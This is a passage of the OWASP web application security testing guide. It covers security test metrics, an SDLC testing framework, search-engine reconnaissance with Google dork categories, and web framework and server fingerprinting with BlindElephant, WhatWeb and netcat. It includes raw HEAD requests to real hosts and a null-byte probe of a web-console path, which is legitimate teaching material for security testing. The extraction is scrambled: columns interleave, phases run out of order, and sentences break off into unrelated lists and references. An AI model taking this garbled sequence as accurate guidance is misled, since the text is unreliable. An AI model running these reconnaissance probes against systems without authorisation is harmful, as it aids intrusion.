lowering the cost of fixing the vulnerabilities. It is less expensive to deal with vulnerabilities in the same phase of the SDLC that they are found, rather then fixing them later in another phase. Security test metrics can support security risk, cost, and defect management analysis when they are associated with tangible and timed goals such as: • Reducing the overall number of vulnerabilities by 30% • Fixing security issues by a certain deadline (e.g., before beta release) Security test data can be absolute, such as the number of vulnerabilities detected during manual code review, as well as comparative, such as the number of vulnerabilities detected in code reviews compared to penetration tests. To answer questions about the quality of the security process, it is important to determine a baseline for what could be considered acceptable and good. Security test data can also support specific objectives of the security analysis. These objects could be compliance with security regulations and information security standards, management of security processes, the identification of security root causes and process improvements, and security cost benefit analysis. When security test data is reported it has to provide metrics to support the analysis. The scope of the analysis is the interpretation of test data to find clues about the security of the software being produced as well the effectiveness of the process. Some examples of clues supported by security test data can be: • Are vulnerabilities reduced to an acceptable level for release? • How does the security quality of this product compare with similar software products? • Are all security test requirements being met? • What are the major root causes of security issues? • How numerous are security flaws compared to security bugs? • Which security activity is most effective in finding vulnerabilities? • Which team is more productive in fixing security defects and vulnerabilities? • Which percentage of overall vulnerabilities are high risk? • Which tools are most effective in detecting security vulnerabilities? • Which kind of security tests are most effective in finding vulnerabilities (e.g., white box vs. black box) tests? • How many security issues are found during secure code reviews? • How many security issues are found during secure design reviews? In order to make a sound judgment using the testing data, it is important to have a good understanding of the testing process as well as the testing tools. A tool taxonomy should be adopted to decide which security tools to use. Security tools can be qualified as being good at finding common known vulnerabilities targeting different artifacts. The issue is that the unknown security issues are not tested. The fact that a security test is clear of issues does not mean that the software or application is good. Some studies [22] have demonstrated that, at best, tools can only find 45% of overall vulnerabilities. Even the most sophisticated automation tools are not a match for an experienced security tester. Just relying on successful test results from automation tools will give security practitioners a false sense of security.Typically, the more experienced the security testers are with the security testing methodology and testing tools, the better the results of the security test and analysis will be. It is important that managers making an investment in security testing tools also consider an investment in hiring skilled human resources as well as security test training. Reporting Requirements The security posture of an application can be characterized from the perspective of the effect, such as number of vulnerabilities and the risk rating of the vulnerabilities, as well as from the perspective of the cause or origin, such as coding errors, architectural flaws, and configuration issues. Vulnerabilities can be classified according to different criteria. The most commonly used vulnerability severity metric is the Forum of Incident Response and Security Teams (FIRST) Common Vulnerability Scoring System (CVSS), which is currently in release version 2 with version 3 due for release shortly. When reporting security test data the best practice is to include the following information: • The categorization of each vulnerability by type • The security threat that the issue is exposed to • The root cause of security issues (e.g., security bugs, security flaw) • The testing technique used to find the issue • The remediation of the vulnerability (e.g., the countermeasure) • The severity rating of the vulnerability (High, Medium, Low and/ or CVSS score) By describing what the security threat is, it will be possible to understand if and why the mitigation control is ineffective in mitigating the threat. Reporting the root cause of the issue can help pinpoint what needs to be fixed. In the case of a white box testing, for example, the software security root cause of the vulnerability will be the 23 Testing Guide Introduction offending source code. References Once issues are reported, it is also important to provide guidance to the software developer on how to re-test and find the vulnerability. This might involve using a white box testing technique (e.g., security code review with a static code analyzer) to find if the code is vulnerable. If a vulnerability can be found via a black box technique (penetration test), the test report also needs to provide information on how to validate the exposure of the vulnerability to the front end (e.g., client). [1] T. DeMarco, Controlling Software Projects: Management, Measurement and Estimation, Yourdon Press, 1982 [2] S. Payne, A Guide to Security Metrics - http://www.sans.org/ reading_room/whitepapers/auditing/55.php [3] NIST, The economic impacts of inadequate infrastructure for software testing - http://www.nist.gov/director/planning/upload/ report02-3.pdf [4] Ross Anderson, Economics and Security Resource Page http://www.cl.cam.ac.uk/~rja14/econsec.html [5] Denis Verdon, Teaching Developers To Fish - OWASP AppSec NYC 2004 [6] Bruce Schneier, Cryptogram Issue #9 - https://www.schneier. com/crypto-gram-0009.html [7 Symantec, Threat Reports - http://www.symantec.com/ security_response/publications/threatreport.jsp [8] FTC, The Gramm-Leach Bliley Act - http://business.ftc.gov/ privacy-and-security/gramm-leach-bliley-act [9] Senator Peace and Assembly Member Simitian, SB 1386http://www.leginfo.ca.gov/pub/01-02/bill/sen/sb_1351-1400/ sb_1386_bill_20020926_chaptered.html [10] European Union, Directive 96/46/EC on the protection of individuals with regard to the processing of personal data and on the free movement of such data - http://ec.europa.eu/justice/ policies/privacy/docs/95-46-ce/dir1995-46_part1_en.pdf [11] NIST, Risk management guide for information technology systems - http://csrc.nist.gov/publications/nistpubs/800-30-rev1/ sp800_30_r1.pdf [12] SEI, Carnegie Mellon, Operationally Critical Threat, Asset, and Vulnerability Evaluation (OCTAVE) - http://www.cert.org/ octave/ [13] Ken Thompson, Reflections on Trusting Trust, Reprinted from Communication of the ACM - http://cm.bell-labs.com/who/ ken/trust.html [14] Gary McGraw, Beyond the Badness-ometer - http://www. drdobbs.com/security/beyond-the-badness-ometer/189500001 [15] FFIEC, Authentication in an Internet Banking Environment http://www.ffiec.gov/pdf/authentication_guidance.pdf [16] PCI Security Standards Council, PCI Data Security Standard - https://www.pcisecuritystandards.org/security_standards/index. php [17] MSDN, Cheat Sheet: Web Application Security Frame h t t p : //m s d n . m i c ro s o f t . c o m /e n - u s / l i b r a r y/m s 9 7 8 5 1 8 . aspx#tmwacheatsheet_webappsecurityframe [18] MSDN, Improving Web Application Security, Chapter 2, Threat And Countermeasures - http://msdn.microsoft.com/en-us/ library/aa302418.aspx [19] Sindre,G. Opdmal A., Capturing Security Requirements Through Misuse Cases ‘ - http://folk.uio.no/nik/2001/21-sindre. pdf [20] Improving Security Across the Software Development Lifecycle Task Force, Referred Data from Caper Johns, Software Assessments, Benchmarks and Best Practices - http://www. criminal-justice-careers.com/resources/SDLCFULL.pdf [21] MITRE, Being Explicit About Weaknesses, Slide 30, Coverage of CWE - http://cwe.mitre.org/documents/being-explicit/ BlackHatDC_BeingExplicit_Slides.ppt [22] Marco Morana, Building Security Into The Software Life Cycle, A Business Case - http://www.blackhat.com/presentations/ bh-usa-06/bh-us-06-Morana-R3.0.pdf The information about how to fix the vulnerability should be detailed enough for a developer to implement a fix. It should provide secure coding examples, configuration changes, and provide adequate references. Finally, the severity rating contributes to the calculation of risk rating and helps to prioritize the remediation effort. Typically, assigning a risk rating to the vulnerability involves external risk analysis based upon factors such as impact and exposure. Business Cases For the security test metrics to be useful, they need to provide value back to the organization’s security test data stakeholders. The stakeholders can include project managers, developers, information security offices, auditors, and chief information officers. The value can be in terms of the business case that each project stakeholder has in terms of role and responsibility. Software developers look at security test data to show that software is coded more securely and efficiently. This allows them to make the case for using source code analysis tools as well as following secure coding standards and attending software security training. Project managers look for data that allows them to successfully manage and utilize security testing activities and resources according to the project plan. To project managers, security test data can show that projects are on schedule and moving on target for delivery dates and are getting better during tests. Security test data also helps the business case for security testing if the initiative comes from information security officers (ISOs). For example, it can provide evidence that security testing during the SDLC does not impact the project delivery, but rather reduces the overall workload needed to address vulnerabilities later in production. To compliance auditors, security test metrics provide a level of software security assurance and confidence that security standard compliance is addressed through the security review processes within the organization. Finally, Chief Information Officers (CIOs) and Chief Information Security Officers (CISOs), who are responsible for the budget that needs to be allocated in security resources, look for derivation of a cost benefit analysis from security test data.This allows them to make informed decisions on which security activities and tools to invest. One of the metrics that supports such analysis is the Return On Investment (ROI) in Security [23]. To derive such metrics from security test data, it is important to quantify the differential between the risk due to the exposure of vulnerabilities and the effectiveness of the security tests in mitigating the security risk, and factor this gap with the cost of the security testing activity or the testing tools adopted. 24 3 The OWASP Testing Framework The OWASP Testing Framework This section describes a typical testing framework that can be developed within an organization. It can be seen as a reference framework that comprises techniques and tasks that are appropriate at various phases of the software development life cycle (SDLC). Overview This section describes a typical testing framework that can be developed within an organization. It can be seen as a reference framework that comprises techniques and tasks that are appropriate at various phases of the software development life cycle (SDLC). Companies and project teams can use this model to develop their own testing framework and to scope testing services from vendors. This framework should not be seen as prescriptive, but as a flexible approach that can be extended and molded to fit an organization’s development process and culture. This section aims to help organizations build a complete strategic testing process, and is not aimed at consultants or contractors who tend to be engaged in more tactical, specific areas of testing. It is critical to understand why building an end-to-end testing framework is crucial to assessing and improving software security. In Writing Secure Code Howard and LeBlanc note that issuing a security bulletin costs Microsoft at least $100,000, and it costs their customers collectively far more than that to implement the security patches. They also note that the US government’s CyberCrime web site (http://www.justice.gov/criminal/cybercrime/) details recent criminal cases and the loss to organizations. Typical losses far exceed USD $100,000. With economics like this, it is little wonder why software vendors move from solely performing black box security testing, which can only be performed on applications that have already been developed, to concentrate on testing in the early cycles of application development such as definition, design, and development. Many security practitioners still see security testing in the realm of penetration testing. As discussed before, while penetration testing has a role to play, it is generally inefficient at finding bugs and relies excessively on the skill of the tester. It should only be considered as an implementation technique, or to raise awareness of production issues. To improve the security of applications, the security quality of the software must be improved. That means testing the security at the definition, design, develop, deploy, and maintenance stages, and not relying on the costly strategy of waiting until code is completely built. As discussed in the introduction of this document, there are many development methodologies such as the Rational Unified Process, eXtreme and Agile development, and traditional waterfall methodologies. The intent of this guide is to suggest neither a particular development methodology nor provide specific guidance that adheres to any particular methodology. Instead, we are presenting a generic development model, and the reader should follow it according to their company process. This testing framework consists of the following activities that should take place: • Before development begins • During definition and design • During development • During deployment • Maintenance and operations Phase 1: Before Development Begins Phase 1.1: Define a SDLC Before application development starts an adequate SDLC must be defined where security is inherent at each stage. Phase 1.2: Review Policies and Standards Ensure that there are appropriate policies, standards, and documentation in place. Documentation is extremely important as it gives development teams guidelines and policies that they can follow. People can only do the right thing if they know what the right thing is. If the application is to be developed in Java, it is essential that there is a Java secure coding standard. If the application is to use cryptography, it is essential that there is a cryptography standard. No policies or standards can cover every situation that the development team will face. By documenting the common and predictable issues, there will be fewer decisions that need to be made during the development process. Phase 1.3: Develop Measurement and Metrics Criteria and Ensure Traceability Before development begins, plan the measurement program. By defining criteria that need to be measured, it provides visibility into defects in both the process and product. It is essential to define the metrics before development begins, as there may be a need to modify the process in order to capture the data. Phase 2: During Definition and Design Phase 2.1: Review Security Requirements Security requirements define how an application works from a security perspective. It is essential that the security requirements are tested. Testing in this case means testing the assumptions that are made in the requirements and testing to see if there are gaps in the requirements definitions. For example, if there is a security requirement that states that users must be registered before they can get access to the whitepapers 25 The OWASP Testing Framework section of a website, does this mean that the user must be registered with the system or should the user be authenticated? Ensure that requirements are as unambiguous as possible. When looking for requirements gaps, consider looking at security mechanisms such as: • User Management • Authentication • Authorization • Data Confidentiality • Integrity • Accountability • Session Management • Transport Security • Tiered System Segregation • Legislative and standards compliance (including Privacy, Government and Industry standards) Phase 2.2: Review Design and Architecture Applications should have a documented design and architecture. This documentation can include models, textual documents, and other similar artifacts. It is essential to test these artifacts to ensure that the design and architecture enforce the appropriate level of security as defined in the requirements. Identifying security flaws in the design phase is not only one of the most cost-efficient places to identify flaws, but can be one of the most effective places to make changes. For example, if it is identified that the design calls for authorization decisions to be made in multiple places, it may be appropriate to consider a central authorization component. If the application is performing data validation at multiple places, it may be appropriate to develop a central validation framework (ie, fixing input validation in one place, rather than in hundreds of places, is far cheaper). If weaknesses are discovered, they should be given to the system architect for alternative approaches. development. These are often smaller decisions that were either too detailed to be described in the design, or issues where no policy or standard guidance was offered. If the design and architecture were not adequate, the developer will be faced with many decisions. If there were insufficient policies and standards, the developer will be faced with even more decisions. Phase 3.1: Code Walk Through The security team should perform a code walk through with the developers, and in some cases, the system architects. A code walk through is a high-level walk through of the code where the developers can explain the logic and flow of the implemented code. It allows the code review team to obtain a general understanding of the code, and allows the developers to explain why certain things were developed the way they were. The purpose is not to perform a code review, but to understand at a high level the flow, the layout, and the structure of the code that makes up the application. Phase 3.2: Code Reviews Armed with a good understanding of how the code is structured and why certain things were coded the way they were, the tester can now examine the actual code for security defects. Static code reviews validate the code against a set of checklists, icluding: • Business requirements for availability, confidentiality, and integrity. • OWASP Guide or Top 10 Checklists for technical exposures (depending on the depth of the review). • Specific issues relating to the language or framework in use, such as the Scarlet paper for PHP or Microsoft Secure Coding checklists for ASP.NET. • Any industry specific requirements, such as Sarbanes-Oxley 404, COPPA, ISO/IEC 27002, APRA, HIPAA, Visa Merchant guidelines, or other regulatory regimes. Phase 2.3: Create and Review UML Models Once the design and architecture is complete, build Unified Modeling Language (UML) models that describe how the application works. In some cases, these may already be available. Use these models to confirm with the systems designers an exact understanding of how the application works. If weaknesses are discovered, they should be given to the system architect for alternative approaches. In terms of return on resources invested (mostly time), static code reviews produce far higher quality returns than any other security review method and rely least on the skill of the reviewer. However, they are not a silver bullet and need to be considered carefully within a full-spectrum testing regime. Phase 2.4: Create and Review Threat Models Armed with design and architecture reviews and the UML models explaining exactly how the system works, undertake a threat modeling exercise. Develop realistic threat scenarios. Analyze the design and architecture to ensure that these threats have been mitigated, accepted by the business, or assigned to a third party, such as an insurance firm. When identified threats have no mitigation strategies, revisit the design and architecture with the systems architect to modify the design. Phase 4: During Deployment Phase 3: During Development Theoretically, development is the implementation of a design. However, in the real world, many design decisions are made during code For more details on OWASP checklists, please refer to OWASP Guide for Secure Web Applications, or the latest edition of the OWASP Top 10. Phase 4.1: Application Penetration Testing Having tested the requirements, analyzed the design, and performed code review, it might be assumed that all issues have been caught. Hopefully this is the case, but penetration testing the application after it has been deployed provides a last check to ensure that nothing has been missed. Phase 4.2: Configuration Management Testing The application penetration test should include the checking of how the infrastructure was deployed and secured. While the application may be secure, a small aspect of the configuration could still be at a default install stage and vulnerable to exploitation. 26 The OWASP Testing Framework Phase 5: Maintenance and Operations Phase 5.1: Conduct Operational Management Reviews There needs to be a process in place which details how the operational side of both the application and infrastructure is managed. Phase 5.2: Conduct Periodic Health Checks Monthly or quarterly health checks should be performed on both the application and infrastructure to ensure no new security risks have been introduced and that the level of security is still intact. Phase 5.3: Ensure Change Verification After every change has been approved and tested in the QA environment and deployed into the production environment, it is vital that the change is checked to ensure that the level of security has not been affected by the change. This should be integrated into the change management process. A Typical SDLC Testing Workflow The following figure shows a typical SDLC Testing Workflow. OWASP TESTING FRAMEWORK WORK FLOW Before Development Review SDLC Process Metrics Criteria Measurement Traceability Policy Review Standards Review Requirements Review Design and Architecture Review Create / Review UML models Development Code Review Code Walkthroughs Unit and System tests Deployment Penetration Testing Configuration Management Reviews Unit and System tests Acceptance Tests Maintenance Chance verification Health Checks Operational Management reviews Regression Tests Definition and Design Create / Review Threat Models 27 Web Application Penetration Testing 4 Web Application Security Testing The following sections describe the 12 subcategories of the Web Application Penetration Testing Methodology: Testing: Introduction and objectives This section describes the OWASP web application security testing methodology and explains how to test for evidence of vulnerabilities within the application due to deficiencies with identified security controls. What is Web Application Security Testing? A security test is a method of evaluating the security of a computer system or network by methodically validating and verifying the effectiveness of application security controls. A web application security test focuses only on evaluating the security of a web application. The process involves an active analysis of the application for any weaknesses, technical flaws, or vulnerabilities. Any security issues that are found will be presented to the system owner, together with an assessment of the impact, a proposal for mitigation or a technical solution. What is a Vulnerability? A vulnerability is a flaw or weakness in a system’s design, implementation, operation or management that could be exploited to compromise the system’s security objectives. What is a Threat? A threat is anything (a malicious external attacker, an internal user, a system instability, etc) that may harm the assets owned by an application (resources of value, such as the data in a database or in the file system) by exploiting a vulnerability. What is a Test? A test is an action to demonstrate that an application meets the security requirements of its stakeholders. The Approach in Writing this Guide The OWASP approach is open and collaborative: • Open: every security expert can participate with his or her experience in the project. Everything is free. • Collaborative: brainstorming is performed before the articles are written so the team can share ideas and develop a collective vision of the project. That means rough consensus, a wider audience and increased participation. This approach tends to create a defined Testing Methodology that will be: • Consistent • Reproducible • Rigorous • Under quality control The problems to be addressed are fully documented and tested. It is important to use a method to test all known vulnerabilities and document all the security test activities. What is the OWASP testing methodology? Security testing will never be an exact science where a complete list of all possible issues that should be tested can be defined. Indeed, security testing is only an appropriate technique for testing the security of web applications under certain circumstances. The goal of this project is to collect all the possible testing techniques, explain these techniques, and keep the guide updated. The OWASP Web Application Security Testing method is based on the black box approach. The tester knows nothing or has very little information about the application to be tested. The testing model consists of: • Tester: Who performs the testing activities • Tools and methodology: The core of this Testing Guide project • Application: The black box to test The test is divided into 2 phases: • Phase 1 Passive mode: In the passive mode the tester tries to understand the application’s logic and plays with the application. Tools can be used for information gathering. For example, an HTTP proxy can be used to observe all the HTTP requests and responses. At the end of this phase, the tester should understand all the access points (gates) of the application (e.g., HTTP headers, parameters, and cookies). The Information Gathering section explains how to perform a passive mode test. For example the tester could find the following: https://www.example.com/login/Authentic_Form.html This may indicate an authentication form where the application requests a username and a password. The following parameters represent two access points (gates) to the application: http://www.example.com/Appx.jsp?a=1&b=1 In this case, the application shows two gates (parameters a and b). All the gates found in this phase represent a point of testing. A spreadsheet with the directory tree of the application and all the access points would be useful for the second phase. 28 Web Application Penetration Testing • Phase 2 Active mode: In this phase the tester begins to test using the methodology described in the follow sections. The set of active tests have been split into 11 sub-categories for a total of 91 controls: • Information Gathering • Configuration and Deployment Management Testing • Identity Management Testing • Authentication Testing • Authorization Testing • Session Management Testing • Input Validation Testing • Error Handling • Cryptography • Business Logic Testing • Client Side Testing Testing for Information Gathering Understanding the deployed configuration of the server hosting the web application is almost as important as the application security testing itself. After all, an application chain is only as strong as its weakest link. Application platforms are wide and varied, but some key platform configuration errors can compromise the application in the same way an unsecured application can compromise the server. Conduct search engine discovery/reconnaissance for information leakage (OTG-INFO-001) Summary There are direct and indirect elements to search engine discovery and reconnaissance. Direct methods relate to searching the indexes and the associated content from caches. Indirect methods relate to gleaning sensitive design and configuration information by searching forums, newsgroups, and tendering websites. Once a search engine robot has completed crawling, it commences indexing the web page based on tags and associated attributes, such asJoomla Drupal DotNetNuke DNN Platform - http://www.dnnsoftware.com Tools A list of general and well-known tools is presented below. There are also a lot of other utilities, as well as framework-based fingerprinting tools. WhatWeb Website: http://www.morningstarsecurity.com/research/whatweb Currently one of the best fingerprinting tools on the market. Included in a default Kali Linux build. Language: Ruby Matches for fingerprinting are made with: Tip: before starting dirbusting, it is recommended to check the robots.txt file first. Sometimes application specific folders and other sensitive information can be found there as well. An example of such a robots.txt file is presented on a screenshot below. • Text strings (case sensitive) • Regular expressions • Google Hack Database queries (limited set of keywords) • MD5 hashes • URL recognition • HTML tag patterns • Custom ruby code for passive and aggressive operations 46 Web Application Penetration Testing Sample output is presented on a screenshot below: Wapplyzer is a Firefox Chrome plug-in. It works only on regular expression matching and doesn’t need anything other than the page to be loaded on browser. It works completely at the browser level and gives results in the form of icons. Although sometimes it has false positives, this is very handy to have notion of what technologies were used to construct a target website immediately after browsing a page. Sample output of a plug-in is presented on a screenshot below. BlindElephant Website: https://community.qualys.com/community/blindelephant This great tool works on the principle of static file checksum based version difference thus providing a very high quality of fingerprinting. Language: Python Sample output of a successful fingerprint: pentester$ python BlindElephant.py http://my_target drupal Loaded /Library/Python/2.7/site-packages/blindelephant/ dbs/drupal.pkl with 145 versions, 478 differentiating paths, and 434 version groups. Starting BlindElephant fingerprint for version of drupal at http:// my_target References Whitepapers Hit http://my_target/CHANGELOG.txt File produced no match. Error: Retrieved file doesn’t match known fingerprint. 527b085a3717bd691d47713dff74acf4 Remediation The general advice is to use several of the tools described above and check logs to better understand what exactly helps an attacker to disclose the web framework. By performing multiple scans after changes have been made to hide framework tracks, it’s possible to achieve a better level of security and to make sure of the framework can not be detected by automatic scans. Below are some specific recommendations by framework marker location and some additional interesting approaches. Hit http://my_target/INSTALL.txt File produced no match. Error: Retrieved file doesn’t match known fingerprint. 14dfc133e4101be6f0ef5c64566da4a4 Hit http://my_target/misc/drupal.js Possible versions based on result: 7.12, 7.13, 7.14 Hit http://my_target/MAINTAINERS.txt File produced no match. Error: Retrieved file doesn’t match known fingerprint. 36b740941a19912f3fdbfcca7caa08ca Hit http://my_target/themes/garland/style.css Possible versions based on result: 7.2, 7.3, 7.4, 7.5, 7.6, 7.7, 7.8, 7.9, 7.10, 7.11, 7.12, 7.13, 7.14 ... Fingerprinting resulted in: 7.14 • Saumil Shah: “An Introduction to HTTP fingerprinting” - http://www. net-square.com/httprint_paper.html • Anant Shrivastava : “Web Application Finger Printing” - http://anantshri.info/articles/web_app_finger_printing.html HTTP headers Check the configuration and disable or obfuscate all HTTP-headers that disclose information the technologies used. Here is an interesting article about HTTP-headers obfuscation using Netscaler: http:// grahamhosking.blogspot.ru/2013/07/obfuscating-http-header-using-netscaler.html Cookies It is recommended to change cookie names by making changes in the corresponding configuration files. HTML source code Manually check the contents of the HTML code and remove everything that explicitly points to the framework. General guidelines: Best Guess: 7.14 Wappalyzer Website: http://wappalyzer.com • Make sure there are no visual markers disclosing the framework • Remove any unnecessary comments (copyrights, bug information, specific framework comments) • Remove META and generator tags • Use the companies own css or js files and do not store those in a 47 Web Application Penetration Testing framework-specific folders • Do not use default scripts on the page or obfuscate them if they must be used. Specific files and folders General guidelines: • Remove any unnecessary or unused files on the server. This implies text files disclosing information about versions and installation too. • Restrict access to other files in order to achieve 404-response when accessing them from outside. This can be done, for example, by modifying htaccess file and adding RewriteCond or RewriteRule there. An example of such restriction for two common WordPress folders is presented below. RewriteCond %{REQUEST_URI} /wp-login\.php$ [OR] RewriteCond %{REQUEST_URI} /wp-admin/$ RewriteRule $ /http://your_website [R=404,L] However, these are not the only ways to restrict access. In order to automate this process, certain framework-specific plugins exist. One example for WordPress is StealthLogin (http://wordpress.org/plugins/ stealth-login-page). Additional approaches General guidelines: [1] Checksum management The purpose of this approach is to beat checksum-based scanners and not let them disclose files by their hashes. Generally, there are two approaches in checksum management: • Change the location of where those files are placed (i.e. move them to another folder, or rename the existing folder) • Modify the contents - even slight modification results in a completely different hash sum, so adding a single byte in the end of the file should not be a big problem. [2] Controlled chaos A funny and effective method that involves adding bogus files and folders from other frameworks in order to fool scanners and confuse an attacker. But be careful not to overwrite existing files and folders and to break the current framework! Map Application Architecture (OTG-INFO-010) Summary The complexity of interconnected and heterogeneous web server infrastructure can include hundreds of web applications and makes configuration management and review a fundamental step in testing and deploying every single application. In fact it takes only a single vulnerability to undermine the security of the entire infrastructure, and even small and seemingly unimportant problems may evolve into severe risks for another application on the same server. To address these problems, it is of utmost importance to perform an in-depth review of configuration and known security issues. Before performing an in-depth review it is necessary to map the network and application architecture. The different elements that make up the infrastructure need to be determined to understand how they interact with a web application and how they affect security. How to Test Map the application architecture The application architecture needs to be mapped through some test to determine what different components are used to build the web application. In small setups, such as a simple CGI-based application, a single server might be used that runs the web server which executes the C, Perl, or Shell CGIs application, and perhaps also the authentication mechanism. On more complex setups, such as an online bank system, multiple servers might be involved. These may include a reverse proxy, a frontend web server, an application server and a database server or LDAP server. Each of these servers will be used for different purposes and might be even be divided in different networks with firewalls between them. This creates different DMZs so that access to the web server will not grant a remote user access to the authentication mechanism itself, and so that compromises of the different elements of the architecture can be isolated so that they will not compromise the whole architecture. Getting knowledge of the application architecture can be easy if this information is provided to the testing team by the application developers in document form or through interviews, but can also prove to be very difficult if doing a blind penetration test. In the latter case, a tester will first start with the assumption that there is a simple setup (a single server). Then they will retrieve information from other tests and derive the different elements, question this assumption and extend the architecture map. The tester will start by asking simple questions such as: “Is there a firewalling system protecting the web server?”. This question will be answered based on the results of network scans targeted at the web server and the analysis of whether the network ports of the web server are being filtered in the network edge (no answer or ICMP unreachables are received) or if the server is directly connected to the Internet (i.e. returns RST packets for all non-listening ports). This analysis can be enhanced to determine the type of firewall used based on network packet tests. Is it a stateful firewall or is it an access list filter on a router? How is it configured? Can it be bypassed? Detecting a reverse proxy in front of the web server needs to be done by the analysis of the web server banner, which might directly disclose the existence of a reverse proxy (for example, if ‘WebSEAL’[1] is returned). It can also be determined by obtaining the answers given by the web server to requests and comparing them to the expected answers. For example, some reverse proxies act as “intrusion prevention systems” (or web-shields) by blocking known attacks targeted at the web server. If the web server is known to answer with a 404 message to a request that targets an unavailable page and returns a different error message for some common web attacks like those done by CGI scanners, it might be an indication of a reverse proxy (or an application-level firewall) which is filtering the requests and returning a different error page than the one expected. Another example: if the web server returns a set of available HTTP methods (including TRACE) but the expected methods return errors then there is probably something in between blocking them. In some cases, even the protection system gives itself away: GET /web-console/ServerInfo.jsp%00 HTTP/1.0 HTTP/1.0 200 Pragma: no-cache 48 Web Application Penetration Testing Cache-Control: no-cache Content-Type: text/html Content-Length: 83, in order to return the relevant search results [1]. If the robots. txt file is not updated during the lifetime of the web site, and inline HTML meta tags that instruct robots not to index content have not been used, then it is possible for indexes to contain web content not intended to be included in by the owners. Website owners may use the previously mentioned robots.txt, HTML meta tags, authentication, and tools provided by search engines to remove such content. Search operators Using the advanced “site:” search operator, it is possible to restrict search results to a specific domain [2]. Do not limit testing to just one search engine provider as they may generate different results depending on when they crawled content and their own algorithms. Consider using the following search engines: • Baidu • binsearch.info • Bing • Duck Duck Go • ixquick/Startpage • Google • Shodan • PunkSpider Duck Duck Go and ixquick/Startpage provide reduced information leakage about the tester. Google provides the Advanced “cache:” search operator [2], but this is the equivalent to clicking the “Cached” next to each Google Search Result. Hence, the use of the Advanced “site:” Search Operator and then clicking “Cached” is preferred. The Google SOAP Search API supports the doGetCachedPage and the associated doGetCachedPageResponse SOAP Messages [3] to assist with retrieving cached pages. An implementation of this is under development by the OWASP “Google Hacking” Project. PunkSpider is web application vulnerability search engine. It is of little use for a penetration tester doing manual work. However it can be useful as demonstration of easiness of finding vulnerabilities by script-kiddies. Example To find the web content of owasp.org indexed by a typical search engine, the syntax required is: site:owasp.org Test Objectives To understand what sensitive design and configuration information of the application/system/organization is exposed both directly (on the organization’s website) or indirectly (on a third party website). How to Test Use a search engine to search for: • Network diagrams and configurations • Archived posts and emails by administrators and other key staff • Log on procedures and username formats • Usernames and passwords • Error message content • Development, test, UAT and staging versions of the website To display the index.html of owasp.org as cached, the syntax is: cache:owasp.org 29 Web Application Penetration Testing Google Hacking Database The Google Hacking Database is list of useful search queries for Google. Queries are put in several categories: • Footholds • Files containing usernames • Sensitive Directories • Web Server Detection • Vulnerable Files • Vulnerable Servers • Error Messages • Files containing juicy info • Files containing passwords • Sensitive Online Shopping Info Tools [4] FoundStone SiteDigger: http://www.mcafee.com/uk/downloads/ free-tools/sitedigger.aspx [5] Google Hacker: http://yehg.net/lab/pr0js/files.php/googlehacker. zip [6] Stach & Liu’s Google Hacking Diggity Project: http://www.stachliu.com/resources/tools/google-hacking-diggity-project/ [7] PunkSPIDER: http://punkspider.hyperiongray.com/ References Web [1] “Google Basics: Learn how Google Discovers, Crawls, and Serves Web Pages” - https://support.google.com/webmasters/answer/70897 [2] “Operators and More Search Help”: https://support.google.com/ websearch/answer/136861?hl=en [3] “Google Hacking Database”: http://www.exploit-db.com/google-dorks/ Remediation Carefully consider the sensitivity of design and configuration information before it is posted online. Periodically review the sensitivity of existing design and configuration information that is posted online. Fingerprint Web Server (OTG-INFO-002) Summary Web server fingerprinting is a critical task for the penetration tester. Knowing the version and type of a running web server allows testers to determine known vulnerabilities and the appropriate exploits to use during testing. There are several different vendors and versions of web servers on the market today. Knowing the type of web server that is being tested significantly helps in the testing process and can also change the course of the test. This information can be derived by sending the web server specific commands and analyzing the output, as each version of web server software may respond differently to these commands. By knowing how each type of web server responds to specific commands and keeping this information in a web server fingerprint database, a penetration tester can send these commands to the web server, analyze the response, and compare it to the database of known signatures. Please note that it usually takes several different commands to accurately identify the web server, as different versions may react similarly to the same command. Rarely do different versions react the same to all HTTP commands. So by sending several different commands, the tester can increase the accuracy of their guess. Test Objectives Find the version and type of a running web server to determine known vulnerabilities and the appropriate exploits to use during testing. How to Test Black Box testing The simplest and most basic form of identifying a web server is to look at the Server field in the HTTP response header. Netcat is used in this experiment. Consider the following HTTP Request-Response: $ nc 202.41.76.251 80 HEAD / HTTP/1.0 HTTP/1.1 200 OK Date: Mon, 16 Jun 2003 02:53:29 GMT Server: Apache/1.3.3 (Unix) (Red Hat/Linux) Last-Modified: Wed, 07 Oct 1998 11:18:14 GMT ETag: “1813-49b-361b4df6” Accept-Ranges: bytes Content-Length: 1179 Connection: close Content-Type: text/html From the Server field, one can understand that the server is likely Apache, version 1.3.3, running on Linux operating system. Four examples of the HTTP response headers are shown below. From an Apache 1.3.23 server: HTTP/1.1 200 OK Date: Sun, 15 Jun 2003 17:10: 49 GMT Server: Apache/1.3.23 Last-Modified: Thu, 27 Feb 2003 03:48: 19 GMT ETag: 32417-c4-3e5d8a83 Accept-Ranges: bytes Content-Length: 196 Connection: close Content-Type: text/HTML 30 Web Application Penetration Testing From a Microsoft IIS 5.0 server: HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Expires: Yours, 17 Jun 2003 01:41: 33 GMT Date: Mon, 16 Jun 2003 01:41: 33 GMT Content-Type: text/HTML Accept-Ranges: bytes Last-Modified: Wed, 28 May 2003 15:32: 21 GMT ETag: b0aac0542e25c31: 89d Content-Length: 7369 From a Netscape Enterprise 4.1 server: HTTP/1.1 200 OK Server: Netscape-Enterprise/4.1 Date: Mon, 16 Jun 2003 06:19: 04 GMT Content-type: text/HTML Last-modified: Wed, 31 Jul 2002 15:37: 56 GMT Content-length: 57 Accept-ranges: bytes Connection: close From a SunONE 6.1 server: HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Tue, 16 Jan 2007 14:53:45 GMT Content-length: 1186 Content-type: text/html Date: Tue, 16 Jan 2007 14:50:31 GMT Last-Modified: Wed, 10 Jan 2007 09:58:26 GMT Accept-Ranges: bytes Connection: close However, this testing methodology is limited in accuracy. There are several techniques that allow a web site to obfuscate or to modify the server banner string. For example one could obtain the following answer: 403 HTTP/1.1 Forbidden Date: Mon, 16 Jun 2003 02:41: 27 GMT Server: Unknown-Webserver/1.0 Connection: close Content-Type: text/HTML; charset=iso-8859-1 In this case, the server field of that response is obfuscated. The tester cannot know what type of web server is running based on such information. Protocol Behavior More refined techniques take in consideration various characteristics of the several web servers available on the market. Below is a list of some methodologies that allow testers to deduce the type of web server in use. HTTP header field ordering The first method consists of observing the ordering of the several headers in the response. Every web server has an inner ordering of the header. Consider the following answers as an example: Response from Apache 1.3.23 $ nc apache.example.com 80 HEAD / HTTP/1.0 HTTP/1.1 200 OK Date: 